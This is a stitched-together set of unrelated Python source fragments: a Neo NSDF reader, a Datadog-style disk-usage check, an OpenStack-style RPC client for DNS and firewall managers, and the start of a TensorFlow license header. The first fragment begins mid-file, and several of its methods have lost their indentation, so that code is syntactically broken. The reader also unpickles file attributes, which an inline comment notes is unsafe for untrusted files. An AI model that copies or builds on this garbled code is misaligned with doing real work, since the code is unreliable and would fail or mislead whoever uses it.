            block.segments.append(self.read_segment(lazy=lazy, group=child, reader=reader))
        for child in group['channel_indexes/'].values():
            block.channel_indexes.append(self.read_channelindex(lazy=lazy, group=child, reader=reader))
def read_segment(self, lazy=False, cascade=True, group=None, reader=None):
"""
Read a Segment from the file
:param lazy: Enables lazy reading
:param cascade: Read nested objects or not?
:param group: HDF5 Group representing the segment in NSDF model tree (optional)
:param reader: NSDFReader instance (optional)
:return: Read segment
"""
segment = Segment()
group, reader, single_segment = self._select_first_container(group, reader, 'segment')
if group is None:
return None
attrs = group.attrs
if cascade:
self._read_segment_children(lazy, group, reader, segment)
if single_segment:
segment.create_many_to_one_relationship()
self._read_container_metadata(attrs, segment, path=group.name)
return segment
def _read_segment_children(self, lazy, group, reader, segment):
for child in group['analogsignals/'].values():
segment.analogsignals.append(self.read_analogsignal(lazy=lazy, group=child, reader=reader))
for child in group['irregularlysampledsignals/'].values():
segment.irregularlysampledsignals.append(self.read_irregularlysampledsignal(lazy=lazy, group=child,
reader=reader))
for child in group['events/'].values():
segment.events.append(self.read_event(lazy=lazy, group=child, reader=reader))
for child in group['epochs/'].values():
segment.epochs.append(self.read_epoch(lazy=lazy, group=child, reader=reader))
    def read_analogsignal(self, lazy=False, cascade=True, group=None, reader=None):
        """
        Read an AnalogSignal from the file (must be child of a Segment)

        :param lazy: Enables lazy reading
        :param cascade: Read nested objects or not?
        :param group: HDF5 Group representing the analogsignal in NSDF model tree
        :param reader: NSDFReader instance
        :return: Read AnalogSignal
        """
        attrs = group.attrs
        # A 'reference_to' attribute marks a node written for an object that was
        # already serialized; return the previously read shared instance.
        if attrs.get('reference_to') is not None:
            return self.objects_dict[attrs['reference_to']]

        uid = attrs['uid']
        data_group = reader.data['uniform/{}/signal'.format(uid)]

        t_start = self._read_analogsignal_t_start(attrs, data_group)
        signal = self._create_analogsignal(data_group, lazy, group, t_start, uid, reader)

        self._read_basic_metadata(attrs, signal, path=group.name)

        # NOTE(review): self.objects_dict is not initialized anywhere in the
        # visible code (__init__/read_all_blocks) — presumably set up in
        # _init_reading or _select_first_container; verify.
        self.objects_dict[uid] = signal
        return signal
def read_irregularlysampledsignal(self, lazy=False, cascade=True, group=None, reader=None):
    """
    Read an IrregularlySampledSignal from the file (must be child of a Segment)
    :param lazy: Enables lazy reading
    :param cascade: Read nested objects or not? (unused here: the signal has no children)
    :param group: HDF5 Group representing the irregularlysampledsignal in NSDF model tree
    :param reader: NSDFReader instance
    :return: Read IrregularlySampledSignal
    """
    attrs = group.attrs
    # Duplicate entries only store a reference to the original object.
    if attrs.get('reference_to') is not None:
        return self.objects_dict[attrs['reference_to']]
    uid = attrs['uid']
    # Irregularly sampled data lives under the NSDF 'nonuniform' section.
    data_group = reader.data['nonuniform/{}/signal'.format(uid)]
    signal = self._create_irregularlysampledsignal(data_group, lazy, group, uid, reader)
    self._read_basic_metadata(attrs, signal, path=group.name)
    self.objects_dict[uid] = signal
    return signal
def read_event(self, lazy=False, cascade=True, group=None, reader=None):
    """
    Read an Event from the file (must be child of a Segment)
    :param lazy: Enables lazy reading
    :param cascade: Read nested objects or not? (unused here: an Event has no children)
    :param group: HDF5 Group representing the event in NSDF model tree
    :param reader: NSDFReader instance
    :return: Read Event
    """
    attrs = group.attrs
    # Duplicate entries only store a reference to the original object.
    if attrs.get('reference_to') is not None:
        return self.objects_dict[attrs['reference_to']]
    uid = attrs['uid']
    # Event times live under the NSDF 'event' data section, keyed by uid.
    data_group = reader.data['event/{}/times/data'.format(uid)]
    event = self._create_event(data_group, group, lazy, reader, uid)
    self._read_basic_metadata(attrs, event, path=group.name)
    self.objects_dict[uid] = event
    return event
def read_epoch(self, lazy=False, cascade=True, group=None, reader=None):
    """
    Read an Epoch from the file (must be child of a Segment)
    :param lazy: Enables lazy reading
    :param cascade: Read nested objects or not? (unused here: an Epoch has no children)
    :param group: HDF5 Group representing the epoch in NSDF model tree
    :param reader: NSDFReader instance
    :return: Read Epoch
    """
    attrs = group.attrs
    # Duplicate entries only store a reference to the original object.
    if attrs.get('reference_to') is not None:
        return self.objects_dict[attrs['reference_to']]
    uid = attrs['uid']
    # Epochs are stored as two parallel event datasets: start times and durations.
    times_group = reader.data['event/{}/times/data'.format(uid)]
    durations_group = reader.data['event/{}/durations/data'.format(uid)]
    epoch = self._create_epoch(times_group, durations_group, group, lazy, reader, uid)
    self._read_basic_metadata(attrs, epoch, path=group.name)
    self.objects_dict[uid] = epoch
    return epoch
def read_channelindex(self, lazy=False, cascade=True, group=None, reader=None):
    """
    Read a ChannelIndex from the file (must be child of a Block)
    :param lazy: Enables lazy reading
    :param cascade: Read nested objects (the index's AnalogSignals) or not?
    :param group: HDF5 Group representing the channelindex in NSDF model tree
    :param reader: NSDFReader instance
    :return: Read ChannelIndex
    """
    attrs = group.attrs
    channelindex = self._create_channelindex(group)
    if cascade:
        self._read_channelindex_children(lazy, group, reader, channelindex)
    self._read_basic_metadata(attrs, channelindex, path=group.name)
    return channelindex
def _read_channelindex_children(self, lazy, group, reader, channelindex):
    """Read every AnalogSignal referenced by *channelindex*."""
    signals = channelindex.analogsignals
    for child_group in group['analogsignals/'].values():
        signals.append(self.read_analogsignal(lazy=lazy, group=child_group, reader=reader))
def load_lazy_object(self, object):
    """
    Load the full (non-lazy) version of a previously lazily-read object.
    :param object: Neo object that was read with lazy=True
    :return: Fully-loaded object of the same type
    """
    # Dispatch to the matching read_* method based on the object's class,
    # e.g. AnalogSignal -> read_analogsignal. (Locals renamed so the
    # builtin `type` is no longer shadowed; stray semicolon removed.)
    type_name = object.__class__.__name__.lower()
    read_function = getattr(self, 'read_' + type_name)
    reader = self._init_reading()
    # The object's location inside the model tree was stored in its
    # annotations at read time (see _read_basic_metadata).
    group = reader.model[object.annotations['nsdfio_path']]
    return read_function(lazy=False, cascade=False, group=group, reader=reader)
def _init_reading(self):
    """Open the NSDF file and reset per-read state; return the NSDFReader."""
    reader = nsdf.NSDFReader(self.filename)
    # The file's modification time becomes file_datetime on read objects.
    self.file_datetime = datetime.fromtimestamp(os.stat(self.filename).st_mtime)
    # Cache of already-read objects, keyed by uid (used for 'reference_to').
    self.objects_dict = {}
    return reader
def _select_first_container(self, group, reader, name):
    """
    Resolve which (group, reader) pair to read a container from.

    When *group* is None, the first entry under '<name>s/' in the model
    tree is selected. The returned boolean tells the caller that a single,
    implicitly-chosen container is being read (used e.g. to decide whether
    to build many-to-one relationships).
    """
    if reader is None:
        reader = self._init_reading()
    single = False
    if group is None:
        path = self.modeltree_path + name + 's/'
        # Pick the first container if at least one exists; group stays
        # None otherwise and the caller returns None.
        if len(reader.model[path].values()) > 0:
            group = list(reader.model[path].values())[0]
        single = True
    return group, reader, single
def _read_container_metadata(self, attrs, container, path):
    """Read all metadata of a container object (Block or Segment)."""
    self._read_basic_metadata(attrs, container, path)
    self._read_datetime_attributes(attrs, container)
    self._read_index_attribute(attrs, container)
def _read_basic_metadata(self, attrs, signal, path):
    """Read name/description/annotations and record the object's tree path."""
    self._read_basic_attributes(attrs, signal)
    self._read_annotations(attrs, signal)
    # Stored so load_lazy_object() can locate this object in the file again.
    signal.annotations['nsdfio_path'] = path
def _read_basic_attributes(self, attrs, object):
    """Copy optional name/description attributes and set file_origin."""
    if attrs.get('name') is not None:
        object.name = self._decode_string(attrs['name'])
    if attrs.get('description') is not None:
        object.description = self._decode_string(attrs['description'])
    object.file_origin = self.filename
def _read_datetime_attributes(self, attrs, object):
    """Set file_datetime and, when stored, parse rec_datetime."""
    object.file_datetime = self.file_datetime
    if attrs.get('rec_datetime') is not None:
        # self.dt_format is the strftime pattern used when the file was written.
        object.rec_datetime = datetime.strptime(attrs['rec_datetime'], self.dt_format)
def _read_annotations(self, attrs, object):
    """Restore the annotations dict, if one was stored."""
    if attrs.get('annotations') is not None:
        # NOTE(review): pickle.loads on file contents is unsafe for files
        # from untrusted sources -- acceptable only because NSDF files are
        # expected to be produced locally by the matching writer.
        object.annotations = pickle.loads(attrs['annotations'])
def _read_index_attribute(self, attrs, object):
    """Restore the container's integer index, if one was stored."""
    if attrs.get('index') is not None:
        object.index = int(attrs['index'])
def _create_analogsignal(self, data_group, lazy, group, t_start, uid, reader):
    """Build an AnalogSignal, either lazily (metadata only) or fully loaded."""
    if lazy:
        # Only the shape is read; axes are swapped so lazy_shape matches the
        # transposed layout produced by the eager path (see
        # _create_normal_analogsignal's np.swapaxes).
        data_shape = data_group.shape
        data_shape = (data_shape[1], data_shape[0])
        signal = self._create_lazy_analogsignal(data_shape, data_group, uid, t_start)
    else:
        dataobj = reader.get_uniform_data(uid, 'signal')
        data = self._read_signal_data(dataobj, group)
        signal = self._create_normal_analogsignal(data, dataobj, uid, t_start)
    return signal
def _create_irregularlysampledsignal(self, data_group, lazy, group, uid, reader):
    """
    Build an IrregularlySampledSignal, either lazily or fully loaded.

    In the lazy case the signal carries empty data/times plus a
    ``lazy_shape`` describing the on-disk shape (transposed, since the
    loaded path swaps axes 0 and 1 as well).
    """
    if lazy:
        data_shape = (data_group.shape[1], data_group.shape[0])
        data = []
        times = []
    else:
        dataobj = reader.get_nonuniform_data(uid, 'signal')
        # Swap to neo's (samples, channels) layout. (Stray trailing
        # semicolon removed.)
        data = np.swapaxes(self._read_signal_data(dataobj, group), 0, 1)
        times = dataobj.get_times()
    signal = IrregularlySampledSignal(times, data, units=data_group.attrs['unit'], dtype=data_group.dtype,
                                      time_units=reader.mapping['time/{}_signal'.format(uid)].attrs['unit'])
    if lazy:
        signal.lazy_shape = data_shape
    return signal
def _create_event(self, data_group, group, lazy, reader, uid):
    """Build an Event, lazily (empty times/labels) or fully loaded."""
    if lazy:
        times = []
        labels = np.array([], dtype='S')
    else:
        dataobj = reader.get_event_data(uid, 'times')
        times = dataobj.get_data(uid)
        labels = self._read_array(group, 'labels')
    event = Event(times=times, units=data_group.attrs['unit'], labels=labels)
    if lazy:
        # Only the number of events is exposed for lazy reads.
        event.lazy_shape = (data_group.shape[0],)
    return event
def _create_epoch(self, times_group, durations_group, group, lazy, reader, uid):
    """Build an Epoch, lazily (empty arrays) or fully loaded."""
    if lazy:
        times = []
        durations = []
        labels = np.array([], dtype='S')
    else:
        # Times and durations are stored as two separate event datasets.
        dataobj = reader.get_event_data(uid, 'times')
        times = dataobj.get_data(uid)
        dataobj = reader.get_event_data(uid, 'durations')
        durations = dataobj.get_data(uid)
        labels = self._read_array(group, 'labels')
    epoch = Epoch(times=pq.Quantity(times, times_group.attrs['unit']),
                  durations=pq.Quantity(durations, durations_group.attrs['unit']),
                  labels=labels)
    if lazy:
        # Only the number of epochs is exposed for lazy reads.
        epoch.lazy_shape = (times_group.shape[0],)
    return epoch
def _read_analogsignal_t_start(self, attrs, data_group):
    """Return the signal's t_start, rescaled to the unit stored on the neo object."""
    raw_start = float(data_group.attrs['tstart'])
    stored_unit = pq.Quantity(1, data_group.attrs['tunit'])
    return (raw_start * stored_unit).rescale(attrs['t_start_unit'])
def _read_signal_data(self, dataobj, group):
data = []
for channel in group['channels/'].values():
channel_uid = channel.attrs['uid']
data += [dataobj.get_data(channel_uid)]
return data
def _create_normal_analogsignal(self, data, dataobj, uid, t_start):
    """Build a fully-loaded AnalogSignal from the per-channel data list."""
    # Swap (channels, samples) -> (samples, channels), as neo expects.
    return AnalogSignal(np.swapaxes(data, 0, 1), dtype=dataobj.dtype, units=dataobj.unit,
                        t_start=t_start, sampling_period=pq.Quantity(dataobj.dt, dataobj.tunit))
def _create_lazy_analogsignal(self, shape, data, uid, t_start):
    """Build an empty AnalogSignal carrying only metadata plus lazy_shape."""
    attrs = data.attrs
    signal = AnalogSignal([], dtype=data.dtype, units=attrs['unit'],
                          t_start=t_start, sampling_period=pq.Quantity(attrs['dt'], attrs['tunit']))
    signal.lazy_shape = shape
    return signal
def _create_channelindex(self, group):
    """Build a ChannelIndex from the arrays stored in its group."""
    return ChannelIndex(index=self._read_array(group, 'index'),
                        channel_names=self._read_array(group, 'channel_names'),
                        channel_ids=self._read_array(group, 'channel_ids'),
                        coordinates=self._read_array(group, 'coordinates'))
def _read_array(self, group, name):
if group.__contains__(name) == False:
return None
array = group[name][:]
if group[name].attrs.get('dimensionality') is not None:
return pq.Quantity(array, group[name].attrs['dimensionality'])
dtype = None
if array.dtype.type == np.void:
array = self._decode_string_array(array)
dtype = 'S'
if group[name].attrs.get('is_list'):
return array
return np.array(array, dtype=dtype)
def _decode_string_array(self, array):
if len(np.shape(array)) == 0:
return self._decode_string(array)
result = []
for row in array:
result.append(self._decode_string_array(row))
return result
def _decode_string(self, string):
return str(string.tostring().decode())
| |
# stdlib
import os
import re
# 3p
try:
import psutil
except ImportError:
psutil = None
# datadog
from checks import AgentCheck
from config import _is_affirmative
from utils.platform import Platform
from utils.subprocess_output import get_subprocess_output
from utils.timeout import (
timeout,
TimeoutException,
)
class Disk(AgentCheck):
    """ Collects metrics about the machine's disks. """
    # -T for filesystem info
    DF_COMMAND = ['df', '-T']
    # Metric name templates; {0} is total/used/free/in_use.
    METRIC_DISK = 'system.disk.{0}'
    METRIC_INODE = 'system.fs.inodes.{0}'

    def __init__(self, name, init_config, agentConfig, instances=None):
        if instances is not None and len(instances) > 1:
            raise Exception("Disk check only supports one configured instance.")
        AgentCheck.__init__(self, name, init_config,
                            agentConfig, instances=instances)
        # Get the configuration once for all
        # NOTE(review): assumes `instances` is a non-empty list at this point;
        # the agent normally guarantees that -- confirm before standalone use.
        self._load_conf(instances[0])

    def check(self, instance):
        """Get disk space/inode stats"""
        # Windows and Mac will always have psutil
        # (we have packaged for both of them)
        if self._psutil():
            self.collect_metrics_psutil()
        else:
            # FIXME: implement all_partitions (df -a)
            self.collect_metrics_manually()

    @classmethod
    def _psutil(cls):
        # True when the optional psutil import at the top of the file succeeded.
        return psutil is not None

    def _load_conf(self, instance):
        """Cache the instance configuration on the check object."""
        self._excluded_filesystems = instance.get('excluded_filesystems', [])
        self._excluded_disks = instance.get('excluded_disks', [])
        self._excluded_mountpoint_re = re.compile(
            instance.get('excluded_mountpoint_re', '^$'))
        self._tag_by_filesystem = _is_affirmative(
            instance.get('tag_by_filesystem', False))
        self._all_partitions = _is_affirmative(
            instance.get('all_partitions', False))

        # Force exclusion of CDROM (iso9660) from disk check
        self._excluded_filesystems.append('iso9660')

        # FIXME: 6.x, drop use_mount option in datadog.conf
        self._load_legacy_option(instance, 'use_mount', False,
                                 operation=_is_affirmative)
        # FIXME: 6.x, drop device_blacklist_re option in datadog.conf
        self._load_legacy_option(instance, 'excluded_disk_re', '^$',
                                 legacy_name='device_blacklist_re',
                                 operation=re.compile)

    def _load_legacy_option(self, instance, option, default,
                            legacy_name=None, operation=lambda l: l):
        """Read *option* from the instance config, falling back to the
        deprecated agent-config key, then store it as self._<option>
        after applying *operation* (e.g. re.compile)."""
        value = instance.get(option, default)
        legacy_name = legacy_name or option

        if value == default and legacy_name in self.agentConfig:
            self.log.warn(
                "Using `{0}` in stackstate.conf has been deprecated"
                " in favor of `{1}` in disk.yaml".format(legacy_name, option)
            )
            value = self.agentConfig.get(legacy_name) or default
        setattr(self, '_{0}'.format(option), operation(value))

    def collect_metrics_psutil(self):
        """Gauge usage/inode metrics for every partition, via psutil."""
        self._valid_disks = {}
        for part in psutil.disk_partitions(all=True):
            # we check all exclude conditions
            if self._exclude_disk_psutil(part):
                continue

            # Get disk metrics here to be able to exclude on total usage
            try:
                disk_usage = timeout(5)(psutil.disk_usage)(part.mountpoint)
            except TimeoutException:
                self.log.warn(
                    u"Timeout while retrieving the disk usage of `%s` mountpoint. Skipping...",
                    part.mountpoint
                )
                continue
            except Exception as e:
                self.log.warn("Unable to get disk metrics for %s: %s", part.mountpoint, e)
                continue
            # Exclude disks with total disk size 0
            if disk_usage.total == 0:
                continue
            # For later, latency metrics
            self._valid_disks[part.device] = (part.fstype, part.mountpoint)
            self.log.debug('Passed: {0}'.format(part.device))

            tags = [part.fstype, 'filesystem:{}'.format(part.fstype)] if self._tag_by_filesystem else []
            # self._use_mount is set via _load_legacy_option in _load_conf.
            device_name = part.mountpoint if self._use_mount else part.device

            # legacy check names c: vs psutil name C:\\
            if Platform.is_win32():
                device_name = device_name.strip('\\').lower()
            for metric_name, metric_value in self._collect_part_metrics(part, disk_usage).iteritems():
                self.gauge(metric_name, metric_value,
                           tags=tags, device_name=device_name)
        # And finally, latency metrics, a legacy gift from the old Windows Check
        if Platform.is_win32():
            self.collect_latency_metrics()

    def _exclude_disk_psutil(self, part):
        # skip cd-rom drives with no disk in it; they may raise
        # ENOENT, pop-up a Windows GUI error for a non-ready
        # partition or just hang;
        # and all the other excluded disks
        return ((Platform.is_win32() and ('cdrom' in part.opts or
                                          part.fstype == '')) or
                self._exclude_disk(part.device, part.fstype, part.mountpoint))

    def _exclude_disk(self, name, filesystem, mountpoint):
        """
        Return True for disks we don't want or that match regex in the config file
        """
        name_empty = not name or name == 'none'

        # allow empty names if `all_partitions` is `yes` so we can evaluate mountpoints
        if name_empty and not self._all_partitions:
            return True
        # device is listed in `excluded_disks`
        elif not name_empty and name in self._excluded_disks:
            return True
        # device name matches `excluded_disk_re`
        elif not name_empty and self._excluded_disk_re.match(name):
            return True
        # device mountpoint matches `excluded_mountpoint_re`
        elif self._excluded_mountpoint_re.match(mountpoint):
            return True
        # fs is listed in `excluded_filesystems`
        elif filesystem in self._excluded_filesystems:
            return True
        # all good, don't exclude the disk
        else:
            return False

    def _collect_part_metrics(self, part, usage):
        """Build the {metric_name: value} dict for a single partition."""
        metrics = {}
        for name in ['total', 'used', 'free']:
            # For legacy reasons, the standard unit is kB
            metrics[self.METRIC_DISK.format(name)] = getattr(usage, name) / 1024.0
        # FIXME: 6.x, use percent, a lot more logical than in_use
        metrics[self.METRIC_DISK.format('in_use')] = usage.percent / 100.0
        if Platform.is_unix():
            metrics.update(self._collect_inodes_metrics(part.mountpoint))

        return metrics

    def _collect_inodes_metrics(self, mountpoint):
        """Build the inode metrics dict for *mountpoint* (Unix only)."""
        metrics = {}
        # we need to timeout this, too.
        try:
            inodes = timeout(5)(os.statvfs)(mountpoint)
        except TimeoutException:
            self.log.warn(
                u"Timeout while retrieving the disk usage of `%s` mountpoint. Skipping...",
                mountpoint
            )
            return metrics
        except Exception as e:
            self.log.warn("Unable to get disk metrics for %s: %s", mountpoint, e)
            return metrics

        if inodes.f_files != 0:
            total = inodes.f_files
            free = inodes.f_ffree

            metrics[self.METRIC_INODE.format('total')] = total
            metrics[self.METRIC_INODE.format('free')] = free
            metrics[self.METRIC_INODE.format('used')] = total - free
            # FIXME: 6.x, use percent, a lot more logical than in_use
            metrics[self.METRIC_INODE.format('in_use')] = \
                (total - free) / float(total)
        return metrics

    def collect_latency_metrics(self):
        """Report per-disk read/write latency rates (Windows legacy metrics)."""
        for disk_name, disk in psutil.disk_io_counters(True).iteritems():
            self.log.debug('IO Counters: {0} -> {1}'.format(disk_name, disk))
            # x100 to have it as a percentage,
            # /1000 as psutil returns the value in ms
            read_time_pct = disk.read_time * 100.0 / 1000.0
            write_time_pct = disk.write_time * 100.0 / 1000.0
            self.rate(self.METRIC_DISK.format('read_time_pct'),
                      read_time_pct, device_name=disk_name)
            self.rate(self.METRIC_DISK.format('write_time_pct'),
                      write_time_pct, device_name=disk_name)

    # no psutil, let's use df
    def collect_metrics_manually(self):
        """Fallback collection path: parse `df -T -k` output."""
        df_out, _, _ = get_subprocess_output(self.DF_COMMAND + ['-k'], self.log)
        self.log.debug(df_out)
        for device in self._list_devices(df_out):
            self.log.debug("Passed: {0}".format(device))
            tags = [device[1], 'filesystem:{}'.format(device[1])] if self._tag_by_filesystem else []
            device_name = device[-1] if self._use_mount else device[0]
            for metric_name, value in self._collect_metrics_manually(device).iteritems():
                self.gauge(metric_name, value, tags=tags,
                           device_name=device_name)

    def _collect_metrics_manually(self, device):
        """Build the metrics dict from one parsed `df` row."""
        result = {}

        used = float(device[3])
        free = float(device[4])

        # device is
        # ["/dev/sda1", "ext4", 524288,  171642,  352646, "33%", "/"]
        result[self.METRIC_DISK.format('total')] = float(device[2])
        result[self.METRIC_DISK.format('used')] = used
        result[self.METRIC_DISK.format('free')] = free

        # Rather than grabbing in_use, let's calculate it to be more precise
        result[self.METRIC_DISK.format('in_use')] = used / (used + free)

        result.update(self._collect_inodes_metrics(device[-1]))
        return result

    def _keep_device(self, device):
        # device is for Unix
        # [/dev/disk0s2, ext4, 244277768, 88767396, 155254372, 37%, /]
        # First, skip empty lines.
        # then filter our fake hosts like 'map -hosts'.
        #       Filesystem    Type   1024-blocks     Used Available Capacity  Mounted on
        #       /dev/disk0s2  ext4     244277768 88767396 155254372    37%    /
        #       map -hosts    tmpfs            0        0         0   100%    /net
        # and finally filter out fake devices
        return (device and len(device) > 1 and
                device[2].isdigit() and
                not self._exclude_disk(device[0], device[1], device[6]))

    def _flatten_devices(self, devices):
        # Some volumes are stored on their own line. Rejoin them here.
        previous = None
        for parts in devices:
            if len(parts) == 1:
                previous = parts[0]
            elif previous is not None:
                # collate with previous line
                parts.insert(0, previous)
                previous = None
            else:
                previous = None
        return devices

    def _list_devices(self, df_output):
        """
        Given raw output for the df command, transform it into a normalized
        list devices. A 'device' is a list with fields corresponding to the
        output of df output on each platform.
        """
        all_devices = [l.strip().split() for l in df_output.splitlines()]

        # Skip the header row and empty lines.
        raw_devices = [l for l in all_devices[1:] if l]

        # Flatten the disks that appear in the multiple lines.
        flattened_devices = self._flatten_devices(raw_devices)

        # Filter fake or unwanted disks.
        return [d for d in flattened_devices if self._keep_device(d)]
| |
from oslo_config import cfg
from oslo_log import log as logging
import oslo_messaging as messaging
from nca47.common import rpc
from nca47.common.i18n import _LI
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
DNS_MANAGER_API = None
FW_MANAGER_API = None
class DNSManagerAPI(object):
    """
    Client side of the DNS manager RPC API.

    API version history:

        1.0 - Initial version
    """

    RPC_API_VERSION = '1.0'

    def __init__(self, topic='dns_manager'):
        rpc.init(CONF)
        target = messaging.Target(topic=topic, version=self.RPC_API_VERSION)
        # version_cap pins the client to messages this API version understands.
        self.client = rpc.get_client(target, version_cap=self.RPC_API_VERSION)

    @classmethod
    def get_instance(cls):
        """
        Return the process-wide singleton client, creating it on first use.

        The rpc.get_client() which is called upon the API object
        initialization will cause an assertion error if the
        designate.rpc.TRANSPORT isn't setup by rpc.init() before.
        This fixes that by creating the rpcapi when demanded.
        """
        global DNS_MANAGER_API
        if not DNS_MANAGER_API:
            DNS_MANAGER_API = cls()
        return DNS_MANAGER_API

    # Zone Methods
    def create_zone(self, context, zone):
        """Synchronously create *zone* on the DNS manager service."""
        LOG.info(_LI("create_zone: Calling central's create_zone."))
        return self.client.call(context, 'create_zone', zone=zone)

    def update_zone(self, context, zone, zone_id):
        """Update zone *zone_id* with the values in *zone*."""
        LOG.info(_LI("update_zone: Calling central's update_zone."))
        return self.client.call(context, 'update_zone', zone=zone,
                                zone_id=zone_id)

    def update_zone_owners(self, context, zone, zone_id):
        """Update the owners of zone *zone_id*."""
        LOG.info(_LI("update_zone_owners: Calling central's update_zone."))
        return self.client.call(context, 'update_zone_owners', zone=zone,
                                zone_id=zone_id)

    def delete_zone(self, context, zone, zone_id):
        """Delete zone *zone_id*."""
        LOG.info(_LI("delete_zone: Calling central's delete_zone."))
        return self.client.call(context, 'delete_zone', zone=zone,
                                zone_id=zone_id)

    def get_zone_one(self, context, zone_id):
        """Fetch a single zone by id."""
        LOG.info(_LI("get_zone_one: Replying rpc client's"
                     "get_zone_one."))
        return self.client.call(context, 'get_zone_one',
                                zone_id=zone_id)

    def get_zones(self, context):
        """Fetch all zones."""
        LOG.info(_LI("get_zones: Replying rpc client's get_zones."))
        return self.client.call(context, 'get_zones')

    # Zone_records Methods
    def create_record(self, context, records_dic, zone_id):
        """Create a record in zone *zone_id*."""
        LOG.info(_LI("create_zone_records: Calling central's"
                     "create_zone_record."))
        return self.client.call(context, 'create_record',
                                records_dic=records_dic, zone_id=zone_id)

    def get_records(self, context, zone_id):
        """Fetch all records of zone *zone_id*."""
        # Dead commented-out call (left behind as a no-op string literal
        # from an older per-record signature) removed.
        LOG.info(_LI("get_zone_record: Calling central's get_zone_record."))
        return self.client.call(context, 'get_records', zone_id=zone_id)

    def update_record(self, context, records_dic, zone_id, rrs_id):
        """Update record *rrs_id* in zone *zone_id*."""
        LOG.info(_LI("update_zone_record: Calling central's"
                     "update_zone_record."))
        return self.client.call(context, 'update_record',
                                records_dic=records_dic, zone_id=zone_id,
                                record_id=rrs_id)

    def delete_record(self, context, records_dic, zone_id, rrs_id):
        """Delete record *rrs_id* from zone *zone_id*."""
        LOG.info(_LI("delete_zone_record: Calling central's"
                     "delete_zone_record."))
        return self.client.call(context, 'delete_record',
                                records_dic=records_dic, zone_id=zone_id,
                                record_id=rrs_id)

    def del_cache(self, context, cache_dic):
        """Clear the DNS cache described by *cache_dic*."""
        LOG.info(_LI("del_cache: Calling central's del_cache."))
        return self.client.call(context, 'del_cache', cache_dic=cache_dic)
class FWManagerAPI(object):
    """
    Client side of the Firewall manager RPC API.

    API version history:

        1.0 - Initial version
    """

    RPC_API_VERSION = '1.0'

    def __init__(self, topic='firewall_manager'):
        rpc.init(CONF)
        target = messaging.Target(topic=topic, version=self.RPC_API_VERSION)
        # version_cap pins the client to messages this API version understands.
        self.client = rpc.get_client(target, version_cap=self.RPC_API_VERSION)

    @classmethod
    def get_instance(cls):
        """
        The rpc.get_client() which is called upon the API object initialization
        will cause a assertion error if the designate.rpc.TRANSPORT isn't setup
        by rpc.init() before.

        This fixes that by creating the rpcapi when demanded.
        """
        global FW_MANAGER_API
        if not FW_MANAGER_API:
            FW_MANAGER_API = cls()
        return FW_MANAGER_API

    # NOTE(review): this mirrors DNSManagerAPI.create_record but goes over the
    # firewall topic -- confirm the firewall service actually handles
    # 'create_record' before relying on it.
    def create_record(self, context, records_dic, zone_id):
        LOG.info(_LI("create_zone_records: Calling central's"
                     "create_zone_record."))
        return self.client.call(context, 'create_record',
                                records_dic=records_dic, zone_id=zone_id)

    # this is a vlan operation
    # NOTE: the 'creat_*' spelling below is part of the established RPC
    # contract (server-side method names) and must not be "fixed" here.
    def creat_vlan(self, context, vlan_infos):
        LOG.info(_LI("creat_vlan: Calling central's"
                     "creat_vlan."))
        return self.client.call(context, 'creat_vlan',
                                vlan_infos=vlan_infos)

    def del_vlan(self, context, id_, vlan_infos):
        LOG.info(_LI("del_vlan: Calling central's"
                     "del_vlan."))
        return self.client.call(context, 'del_vlan',
                                id_=id_, vlan_infos=vlan_infos)

    def get_vlan(self, context, vlan_infos):
        LOG.info(_LI("get_vlan: Calling central's"
                     "get_vlan."))
        return self.client.call(context, 'get_vlan',
                                vlan_infos=vlan_infos)

    def get_vlans(self, context, vlan_infos):
        LOG.info(_LI("get_vlans: Calling central's"
                     "get_vlans."))
        return self.client.call(context, 'get_vlans',
                                vlan_infos=vlan_infos)

    # this is a netservice operation
    def creat_netservice(self, context, netsev_infos):
        LOG.info(_LI("creat_netservice: Calling central's"
                     "creat_netservice."))
        return self.client.call(context, 'creat_netservice',
                                netsev_infos=netsev_infos)

    def del_netservice(self, context, id_, netsev_infos):
        LOG.info(_LI("del_netservice: Calling central's"
                     "del_netservice."))
        return self.client.call(context, 'del_netservice',
                                id_=id_, netsev_infos=netsev_infos)

    def get_netservice(self, context, netsev_infos):
        LOG.info(_LI("get_netservice: Calling central's"
                     "get_netservice."))
        return self.client.call(context, 'get_netservice',
                                netsev_infos=netsev_infos)

    def get_netservices(self, context, netsev_infos):
        LOG.info(_LI("get_netservices: Calling central's"
                     "get_netservices."))
        return self.client.call(context, 'get_netservices',
                                netsev_infos=netsev_infos)

    # this is a addrobj operation
    def add_addrobj(self, context, addrobj_infos):
        LOG.info(_LI("add_addrobj: Calling central's"
                     "add_addrobj."))
        return self.client.call(context, 'add_addrobj',
                                addrobj_infos=addrobj_infos)

    def del_addrobj(self, context, addrobj_infos):
        # The target id is pulled out of the info dict and passed separately.
        LOG.info(_LI("del_addrobj: Calling central's"
                     "del_addrobj."))
        return self.client.call(context, 'del_addrobj',
                                id_=addrobj_infos['id'],
                                addrobj_infos=addrobj_infos)

    def get_addrobj(self, context, addrobj_infos):
        LOG.info(_LI("get_addrobj: Calling central's"
                     "get_addrobj."))
        return self.client.call(context, 'get_addrobj',
                                addrobj_infos=addrobj_infos)

    def get_addrobjs(self, context, addrobj_infos):
        LOG.info(_LI("get_addrobjs: Calling central's"
                     "get_addrobjs."))
        return self.client.call(context, 'get_addrobjs',
                                addrobj_infos=addrobj_infos)

    # this is a snataddrpool operation
    def add_snataddrpool(self, context, snataddrpool_infos):
        LOG.info(_LI("add_snataddrpool: Calling central's"
                     "add_snataddrpool."))
        return self.client.call(context, 'add_snataddrpool',
                                snataddrpool_infos=snataddrpool_infos)

    def del_snataddrpool(self, context, snataddrpool_infos):
        # The target id is pulled out of the info dict and passed separately.
        LOG.info(_LI("del_snataddrpool: Calling central's"
                     "del_snataddrpool."))
        return self.client.call(context, 'del_snataddrpool',
                                id_=snataddrpool_infos['id'],
                                snataddrpool_infos=snataddrpool_infos)

    def get_snataddrpool(self, context, snataddrpool_infos):
        LOG.info(_LI("get_snataddrpool: Calling central's"
                     "get_snataddrpool."))
        return self.client.call(context, 'get_snataddrpool',
                                snataddrpool_infos=snataddrpool_infos)

    def get_snataddrpools(self, context, snataddrpool_infos):
        LOG.info(_LI("get_snataddrpools: Calling central's"
                     "get_snataddrpools."))
        return self.client.call(context, 'get_snataddrpools',
                                snataddrpool_infos=snataddrpool_infos)
| |
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
